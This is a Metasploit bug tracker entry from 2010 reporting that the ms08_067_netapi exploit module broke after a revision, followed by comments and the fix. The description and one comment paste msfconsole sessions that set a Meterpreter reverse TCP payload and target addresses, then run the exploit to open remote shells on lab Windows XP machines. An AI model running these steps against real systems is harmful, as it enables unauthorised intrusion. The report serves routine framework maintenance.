Bug #2310
ms08_067_netapi and some others exploit does nor wotk since rev9914
| Status: | Closed | Start date: | 07/29/2010 | |
|---|---|---|---|---|
| Priority: | Normal | Due date: | ||
| Assignee: | Joshua J. Drake | % Done: | 100% |
|
| Category: | modules - exploits | |||
| Target version: | Metasploit 3.5.0 | |||
| Resolution: | fixed | Release Note: |
Description
Hi,
Since Rev 9914 I'm not able to trigger anymore ms08_067_netapi exploit against a vulnerable test computer . below a small screen dump :
kill_tinnitus:/opt/metasploit/framework3/trunk# ./msfconsole
_
| | o
_ _ _ _ _|_ __, , _ | | __ _|_
/ |/ |/ | |/ | / | / \_|/ \_|/ / \_| |
| | |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
/|
\|
=[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ -- --=[ 568 exploits - 292 auxiliary
+ -- --=[ 212 payloads - 27 encoders - 8 nops
=[ svn r9913 updated 7 days ago (2010.07.22)
mssf >
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set RHOST 192.168.30.11
RHOST => 192.168.30.11
msf exploit(ms08_067_netapi) > set LHOST 192.168.30.1
LHOST => 192.168.30.1
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.30.1:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:French
[*] Selected Target: Windows XP SP2 French (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (748032 bytes) to 192.168.30.11
[*] Meterpreter session 1 opened (192.168.30.1:4444 -> 192.168.30.11:1031) at Thu Jul 29 17:11:27 +0200 2010
meterpreter > exit
[*] Meterpreter session 1 closed. Reason: User exit
msf exploit(ms08_067_netapi) > exit
kill_tinnitus:/opt/metasploit/framework3/trunk# svn up
......
kill_tinnitus:/opt/metasploit/framework3/trunk# ./msfconsole
o 8 o o
8 8 8
ooYoYo. .oPYo. o8P .oPYo. .oPYo. .oPYo. 8 .oPYo. o8 o8P
8' 8 8 8oooo8 8 .oooo8 Yb.. 8 8 8 8 8 8 8
8 8 8 8. 8 8 8 'Yb. 8 8 8 8 8 8 8
8 8 8 `Yooo' 8 `YooP8 `YooP' 8YooP' 8 `YooP' 8 8
..:..:..:.....:::..::.....::.....:8.....:..:.....::..::..:
::::::::::::::::::::::::::::::::::8:::::::::::::::::::::::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
=[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ -- --=[ 574 exploits - 292 auxiliary
+ -- --=[ 212 payloads - 27 encoders - 8 nops
=[ svn r9942 updated today (2010.07.29)
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST 192.168.30.1
LHOST => 192.168.30.1
msf exploit(ms08_067_netapi) > set RHOST 192.168.30.11
RHOST => 192.168.30.11
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.30.1:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:French
[*] Selected Target: Windows XP SP2 French (NX)
[*] Attempting to trigger the vulnerability...
[*] Exploit completed, but no session was created.
msf exploit(ms08_067_netapi) >
Associated revisions
fix next/break handling inside new loop -- fixes #2310
git-svn-id: file:///home/svn/framework3/trunk@9951 4d416f70-5f16-0410-b530-b9f4589650da
History
Updated by Andrew Stubbs over 1 year ago
Seen this too - not sure of exact revision it stopped - but during the last week most likely
Updated by guess-it dzingg over 1 year ago
the best way to get it work is to revert EncodedPayload.encode in ./lib/msf/core/encoded_payload.rb to the one in version 9913.
Looks like the iterations system int this function is not stable yet
Updated by Joshua J. Drake over 1 year ago
- Status changed from New to Resolved
- % Done changed from 0 to 100
Applied in changeset r9951.
Updated by Joshua J. Drake over 1 year ago
- Category set to modules - exploits
- Assignee set to Joshua J. Drake
- Target version set to Metasploit 3.5.0
- Resolution set to fixed
Thanks for the report. Great eye and fix sussuro!
Updated by Jonathan Cran over 1 year ago
- Status changed from Resolved to Closed
OKI: Exploit looks good, logs as follows: msf exploit(ms08_067_netapi) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- RHOST 192.168.1.91 yes The target address RPORT 445 yes Set the SMB service port SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC) Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique: seh, thread, process LHOST 192.168.1.201 yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Automatic Targeting msf exploit(ms08_067_netapi) > set lport 666 lport => 666 msf exploit(ms08_067_netapi) > exploit [*] Started reverse handler on 192.168.1.201:666 [*] Automatically detecting the target... [*] Fingerprint: Windows XP Service Pack 2 - lang:English [*] Selected Target: Windows XP SP2 English (NX) [*] Attempting to trigger the vulnerability... [*] Sending stage (748032 bytes) to 192.168.1.91 [*] Meterpreter session 1 opened (192.168.1.201:666 -> 192.168.1.91:1246) at 2010-08-13 21:49:40 -0700